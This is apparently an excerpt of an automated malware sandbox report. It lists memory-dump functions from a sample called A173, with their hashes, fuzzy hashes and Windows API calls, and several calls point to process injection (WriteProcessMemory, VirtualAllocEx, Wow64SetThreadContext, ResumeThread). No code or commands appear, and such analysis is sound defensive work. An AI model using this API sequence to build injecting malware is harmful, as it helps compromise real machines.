                                                                                  • Instruction Fuzzy Hash: 79E0127130420987D30A7B65F42A2A637ABDB84745B10806BE14A477DACF356C4487A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04A38560
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187908275.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4a30000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID: d1a
                                                                                  • API String ID: 3559483778-4233943314
                                                                                  • Opcode ID: dbb978eaa6c7204b4ba49ddd775d7e36c36b8856074ddfcace01d8396c082a4a
                                                                                  • Instruction ID: 478339922bd85be909d2277bb724b9b446cd1908cf766223eaaeb111fe2998c6
                                                                                  • Opcode Fuzzy Hash: dbb978eaa6c7204b4ba49ddd775d7e36c36b8856074ddfcace01d8396c082a4a
                                                                                  • Instruction Fuzzy Hash: F72126719003499FCB10DFA9D844BDEBBF4BF48314F10842AE919A7281D778A944CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CopyFileW.KERNEL32(?,00000000,?), ref: 04A321B9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187908275.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4a30000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID: d1a
                                                                                  • API String ID: 1304948518-4233943314
                                                                                  • Opcode ID: f1e424628d72112d77cd0dc6c813e9c294f1db7457a8b484c528bca396bb5ac9
                                                                                  • Instruction ID: 0867b07b22323862d236e19873233cc8ea7442943e08d57844522f227ab104d8
                                                                                  • Opcode Fuzzy Hash: f1e424628d72112d77cd0dc6c813e9c294f1db7457a8b484c528bca396bb5ac9
                                                                                  • Instruction Fuzzy Hash: DC212DB1D012199FCB10CFAAD9847DEFBF4EF88310F14816AE918A7245E7349A44CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CopyFileW.KERNEL32(?,00000000,?), ref: 04A321B9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187908275.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4a30000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID: d1a
                                                                                  • API String ID: 1304948518-4233943314
                                                                                  • Opcode ID: 798f767bdca320d6639363e3c35f5434323b6226f1eef2a575f0cf58757a483a
                                                                                  • Instruction ID: bd31abd279b8e0de3b31c0d0dc9d7eb48e20ac875aa24bf3443c23c1ccfa9b7b
                                                                                  • Opcode Fuzzy Hash: 798f767bdca320d6639363e3c35f5434323b6226f1eef2a575f0cf58757a483a
                                                                                  • Instruction Fuzzy Hash: 15212BB1D012199FCB10CFAAD9847DEFBF4EF88310F14816AE918A7245D7349A44CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04A38560
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187908275.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4a30000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID: d1a
                                                                                  • API String ID: 3559483778-4233943314
                                                                                  • Opcode ID: f9911378e01752e48e8fa5e66dea07bf27a437db76d5c04243e7f5050fa4962d
                                                                                  • Instruction ID: 99865176015e089724ef62b4dad8d3ad165627fd6caaabf0c816eda971878101
                                                                                  • Opcode Fuzzy Hash: f9911378e01752e48e8fa5e66dea07bf27a437db76d5c04243e7f5050fa4962d
                                                                                  • Instruction Fuzzy Hash: 812124719003499FCB10DFAAD884BDEBBF5FF48314F10882AE919A7240D778A954CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04A3832E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187908275.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4a30000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID: d1a
                                                                                  • API String ID: 983334009-4233943314
                                                                                  • Opcode ID: dd9ce423709c57bfb0bb48bbaa7e89b1f06ed410fa41cd50bbb36a9a42d812f0
                                                                                  • Instruction ID: d990187ecab450d9e9604b8f560cc11224082b38b408afd00c7a81bf879486c6
                                                                                  • Opcode Fuzzy Hash: dd9ce423709c57bfb0bb48bbaa7e89b1f06ed410fa41cd50bbb36a9a42d812f0
                                                                                  • Instruction Fuzzy Hash: 78212871D002098FCB10DFAAC4857EEBBF4AB48219F15842EE519A7240D778A945CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04A3832E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187908275.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4a30000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID: d1a
                                                                                  • API String ID: 983334009-4233943314
                                                                                  • Opcode ID: 68bff8919611dd4dc68a23bfe9ff7564268f90a15c17e0f65a1b23b886004567
                                                                                  • Instruction ID: 147a659975c969f9496dca263777491e87587fa4992c0ec00a0ca3f825531e2b
                                                                                  • Opcode Fuzzy Hash: 68bff8919611dd4dc68a23bfe9ff7564268f90a15c17e0f65a1b23b886004567
                                                                                  • Instruction Fuzzy Hash: 022137719002098FCB10DFAAC4857EEFBF4AF48218F10842EE519A7340DB78A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04A3845E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187908275.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4a30000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID: d1a
                                                                                  • API String ID: 4275171209-4233943314
                                                                                  • Opcode ID: f41fa5c060c8fe2d5e6103d71861fa2d23b215a764f772a460936baaa5dfe99a
                                                                                  • Instruction ID: 51fbd459d07913bd9fe55ddb48bbffe7f822b882087f60e4e9279e07d6352f6c
                                                                                  • Opcode Fuzzy Hash: f41fa5c060c8fe2d5e6103d71861fa2d23b215a764f772a460936baaa5dfe99a
                                                                                  • Instruction Fuzzy Hash: C01147719002099FCB20DFAAD8447DEFBF5EB48314F20881AE525A7640DB79A944CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 042CBC74
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1186783789.00000000042C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_42c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID: d1a
                                                                                  • API String ID: 544645111-4233943314
                                                                                  • Opcode ID: 00a6564ff97368692e46e97681355aa57c3bb00d2255e41ca644f7be57717734
                                                                                  • Instruction ID: 5c7de991124856445a5096aa2c9707dd4cd88d32ef3cd4d1b9052a28cb0fba10
                                                                                  • Opcode Fuzzy Hash: 00a6564ff97368692e46e97681355aa57c3bb00d2255e41ca644f7be57717734
                                                                                  • Instruction Fuzzy Hash: 9011F4B1D002099FCB10DFAAD884BDEFBF4AF48314F11842EE529A7640DB75A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04A3845E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187908275.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4a30000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID: d1a
                                                                                  • API String ID: 4275171209-4233943314
                                                                                  • Opcode ID: 2bef73514325c5f9d7751d192ddfb7c42dc00bf3b7e0d3c0a66c1471dc346f76
                                                                                  • Instruction ID: adb25dced804c77f9f739c680f9445eb98b6976690324cffbaf5c9ac220f9d4f
                                                                                  • Opcode Fuzzy Hash: 2bef73514325c5f9d7751d192ddfb7c42dc00bf3b7e0d3c0a66c1471dc346f76
                                                                                  • Instruction Fuzzy Hash: 5E1137719002099FCB10DFAAD8447DFFBF5EF88314F20881AE519A7650D775A954CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1186783789.00000000042C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_42c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID: d1a
                                                                                  • API String ID: 947044025-4233943314
                                                                                  • Opcode ID: a9ba77abe7fc25fd4f129de5965269630310b1b72846e1ec0beaef3e15c035b8
                                                                                  • Instruction ID: 9d2f5d9ab1b0d8adb98ebf2bb16572e1ffc650f813b8cb19dbfd1ba24b55eab6
                                                                                  • Opcode Fuzzy Hash: a9ba77abe7fc25fd4f129de5965269630310b1b72846e1ec0beaef3e15c035b8
                                                                                  • Instruction Fuzzy Hash: 09112571D002498BCB20DFAAD4457DFFBF4AB88628F21881ED519A7640DB75A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d$pk=
                                                                                  • API String ID: 0-256936148
                                                                                  • Opcode ID: 62081f39464f43d34cae822388938e908716772b2b834034b75baa17b800f26e
                                                                                  • Instruction ID: e869f6f79e2f6eb8060d6193e6ebb3c2e54b37fa41bc4cef26613c06c92b5aa8
                                                                                  • Opcode Fuzzy Hash: 62081f39464f43d34cae822388938e908716772b2b834034b75baa17b800f26e
                                                                                  • Instruction Fuzzy Hash: F0128A706006068FD714DF59C4809AAB7F6FF88314B25CAADE45A9B761DB30FC42CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: 8f78e548cc12cb2ebb240def2ad84542adfe3cb7c5d2e0d42bab8d4b05876bfa
                                                                                  • Instruction ID: 409fafb265b900f26af80b6447b2311114c37231a553bbee4a464fba58ec4568
                                                                                  • Opcode Fuzzy Hash: 8f78e548cc12cb2ebb240def2ad84542adfe3cb7c5d2e0d42bab8d4b05876bfa
                                                                                  • Instruction Fuzzy Hash: 10415CB6B082507FD72D5669AA914EA7BB5DBA7231B0940ABE005CB343E5247E038371
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: a365362b87f2357b848a977fc1ba6cdbe37cd2121c7486ae8092b4d80b366805
                                                                                  • Instruction ID: f8c3b482b48b2c7edbf6e8307be45258aacc609a7ca07dfe97d5180364ea07d9
                                                                                  • Opcode Fuzzy Hash: a365362b87f2357b848a977fc1ba6cdbe37cd2121c7486ae8092b4d80b366805
                                                                                  • Instruction Fuzzy Hash: 205190B1308200CBD325DF5AE4557A773A7E798300F208026E9468FBA9DBB5BD85C7E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: 6b2586da72136ea2aa602165e920c18d9170b09d7018b37281ad226ffef96731
                                                                                  • Instruction ID: cd69a6654ae3f9b56acb5ca8b5d9a249f9a48fdce0cbc2256af843e9f22e4a9c
                                                                                  • Opcode Fuzzy Hash: 6b2586da72136ea2aa602165e920c18d9170b09d7018b37281ad226ffef96731
                                                                                  • Instruction Fuzzy Hash: 11519271308104CBD324DF5AE5557A772A7E788300F208026E94A8FBA9DBB5BD85C7E6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: df30283f433b65364455ad336ba6e520d73252ccd08fa4d632983dc5ea5dfab7
                                                                                  • Instruction ID: 8878f11917fc1e172eba0bd09bd08892256d6d0bf4863ee412b6a9a84f7f709e
                                                                                  • Opcode Fuzzy Hash: df30283f433b65364455ad336ba6e520d73252ccd08fa4d632983dc5ea5dfab7
                                                                                  • Instruction Fuzzy Hash: 8941F3753083908FD325EF24D69465A77B3FBC5304F11886AD1428BBA6DB35BC46C7A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: 10f1d048253bbe975035b3234fec84fe7ee74ff663fbac40872b021d5ea3f00d
                                                                                  • Instruction ID: 58f9ff5df59aa58e52e472c3e2584753eecf9dee6b0f0f1116b06cd271d3acc0
                                                                                  • Opcode Fuzzy Hash: 10f1d048253bbe975035b3234fec84fe7ee74ff663fbac40872b021d5ea3f00d
                                                                                  • Instruction Fuzzy Hash: 1631D076604244CFD730DF5AD444BAAB7FAEB88310F20C826DA428B764E7B5F881CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: 82a77143d50edb5feda34ae7a551b8060733406e5a5ac73908cc8dcde8ab6e50
                                                                                  • Instruction ID: 8bd4e1fc06f7794e95255d78c61702722820a5e4dd84f4309b10ef0368bdef92
                                                                                  • Opcode Fuzzy Hash: 82a77143d50edb5feda34ae7a551b8060733406e5a5ac73908cc8dcde8ab6e50
                                                                                  • Instruction Fuzzy Hash: 692187763082404FE3269A69E8547677B62DBC6310F1480F7EC09CF7A7D974AC42CB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: 6847727f826d438aa4714401f550ce3a60999148f345595fdc5a12337d749d6d
                                                                                  • Instruction ID: 09f9695013e8149c79de8695a268d366b0176e74fb8de13b7c51097d69e578b3
                                                                                  • Opcode Fuzzy Hash: 6847727f826d438aa4714401f550ce3a60999148f345595fdc5a12337d749d6d
                                                                                  • Instruction Fuzzy Hash: 1921B2747002149FE315AF24D86175A77A7EB88760F61893DD80ADB388DF30FC418BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: 25e8703021c7e07e7593d62e8ef15bd3270182312a71bce882ffa692f63e2b01
                                                                                  • Instruction ID: f8929cd515b0510affd7865096c54543db71a267976b1438de06d605fb4ccdb7
                                                                                  • Opcode Fuzzy Hash: 25e8703021c7e07e7593d62e8ef15bd3270182312a71bce882ffa692f63e2b01
                                                                                  • Instruction Fuzzy Hash: 01217F71A14118DFDB14DF29C950BEA77B6EF89300F1086A9E50DA7345DB31AE818BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: af00d465517adcdac549fca00c5017f8a7cbf47e54f9d74a2fbef91794aba41b
                                                                                  • Instruction ID: ac7be0efdb5564372f1a2c682ae22d0fecd9afc54a2eccf2ad40781eb90377ec
                                                                                  • Opcode Fuzzy Hash: af00d465517adcdac549fca00c5017f8a7cbf47e54f9d74a2fbef91794aba41b
                                                                                  • Instruction Fuzzy Hash: 4421A471A14118DBDB25DF29CD50BDAB7B6EF85300F1182A9E50DAB341DB31AE818F91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187320175.0000000004750000.00000040.00000800.00020000.00000000.sdmp, Offset: 04750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4750000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: d22c3b9b855a0d7a8fd81e67ccd6b7324e453b83abf07e933417ee598f42a447
                                                                                  • Instruction ID: de09b938116103d5681ee83e8a4f1075cf8203699990294c89e7fae4ca0b65e0
                                                                                  • Opcode Fuzzy Hash: d22c3b9b855a0d7a8fd81e67ccd6b7324e453b83abf07e933417ee598f42a447
                                                                                  • Instruction Fuzzy Hash: 67012B723042006B870AA77CA4A65BF77EBDBCD250310407AF50ACB39ACE74BC464771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: db54504fa0af9c485f4475fc3d8a691a587df92c55e5d88145669223ede550ea
                                                                                  • Instruction ID: 6755c5515c0d811c333e3447ed8ab18a37e1eb82ee91397a8546afbfaf848ac9
                                                                                  • Opcode Fuzzy Hash: db54504fa0af9c485f4475fc3d8a691a587df92c55e5d88145669223ede550ea
                                                                                  • Instruction Fuzzy Hash: 4F1188B2B051109FC701EB69D415AAFB7BAEF89310F04402AED05D7342DB35BE41C7A0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: eea3a0a3ef4e5c3ee125e2091b1a380ee006e4a62049a0a04e319ec014816215
                                                                                  • Instruction ID: da08842a7afbf1ec5041df635879033016ceec1668bca9b3bbce2cefc655b235
                                                                                  • Opcode Fuzzy Hash: eea3a0a3ef4e5c3ee125e2091b1a380ee006e4a62049a0a04e319ec014816215
                                                                                  • Instruction Fuzzy Hash: 5C11C476305200AFDB299E5EE8519B777FAEBCD310B19807AE98A87785C730BC41C760
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187186730.0000000004720000.00000040.00000800.00020000.00000000.sdmp, Offset: 04720000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4720000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: 17fe4884a093ebf847644e0180eff8ec9ca24b2b8311b642c4afddb6026c723b
                                                                                  • Instruction ID: 7ab8ed0d7f6092cba013ecbe38f8d854f8aa8a2fff76fb8e80e28df2680600c9
                                                                                  • Opcode Fuzzy Hash: 17fe4884a093ebf847644e0180eff8ec9ca24b2b8311b642c4afddb6026c723b
                                                                                  • Instruction Fuzzy Hash: ED0100357042208BD308B729F5556AA33ABE7CC325F14407AE40AC7398CA38BD81A7A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: d3aed2664f49c9adc056438df29d656e95c336376ba821f3c7317f3dfbd9c150
                                                                                  • Instruction ID: f3844d49ead4fff8539494ddc8425a3e0383dea9e064810906cabf1aad2afed6
                                                                                  • Opcode Fuzzy Hash: d3aed2664f49c9adc056438df29d656e95c336376ba821f3c7317f3dfbd9c150
                                                                                  • Instruction Fuzzy Hash: F4119DB4304209DFDF05DF98D869AAA37BAFB48304F10857DE106C7285DA34A944CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: 0b5d3883abd872da32bb846cd45f72e995fe76d41fbe396f0806e606bc1a3ef6
                                                                                  • Instruction ID: cff5cbd703e09dd086d8c92beb280d811c4c09caf81c524458c9645398446d17
                                                                                  • Opcode Fuzzy Hash: 0b5d3883abd872da32bb846cd45f72e995fe76d41fbe396f0806e606bc1a3ef6
                                                                                  • Instruction Fuzzy Hash: 0A114975B00218EBDF55DE94D850AEEBB77EB88310F00806AEA05A3254DB34AD90DF62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187752902.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_49c0000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: d36fc87e17c620e569e9e1a08038c3af221e0b170d0a839919f79d676295071f
                                                                                  • Instruction ID: 3b558a58d523841f517e59a885261fa0ee6bd90a5e0607554fa7dd25b1006687
                                                                                  • Opcode Fuzzy Hash: d36fc87e17c620e569e9e1a08038c3af221e0b170d0a839919f79d676295071f
                                                                                  • Instruction Fuzzy Hash: 0B11E074300214EFD744EF29D891BAA73A7FB48750F1140B9E80AC7394EA70BD818B61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: e6587fbad0a56e1f54643f6845bcb2fe199c5dc6f43d11c8ba97da7edd24fb0b
                                                                                  • Instruction ID: 828c3d4dbd4ce7ce15899bbb0906c6c8f05cb03372ca58b5f878c0a3604e5c64
                                                                                  • Opcode Fuzzy Hash: e6587fbad0a56e1f54643f6845bcb2fe199c5dc6f43d11c8ba97da7edd24fb0b
                                                                                  • Instruction Fuzzy Hash: 12116D71A041198BDB18FFE9E4916AF7BBAFB89740F10403BD111A7344DA746D418BE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.1187657178.0000000004990000.00000040.00000800.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_4990000_A173.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: pk=$pk=
                                                                                  • API String ID: 0-4014351039
                                                                                  • Opcode ID: a833d350e403aa0023011b8676faa41cba6dcf81ba2583262d3b227dbc8c282f
                                                                                  • Instruction ID: 3cf7769c0497dd78011021406aec5e00099472a7a48c95b4a15eaec7965eab13
                                                                                  • Opcode Fuzzy Hash: a833d350e403aa0023011b8676faa41cba6dcf81ba2583262d3b227dbc8c282f
                                                                                  • Instruction Fuzzy Hash: 1F0171763051009FDB289E8EE45496777FBEBCD314B14843AE94A87B85D730BC8197A0
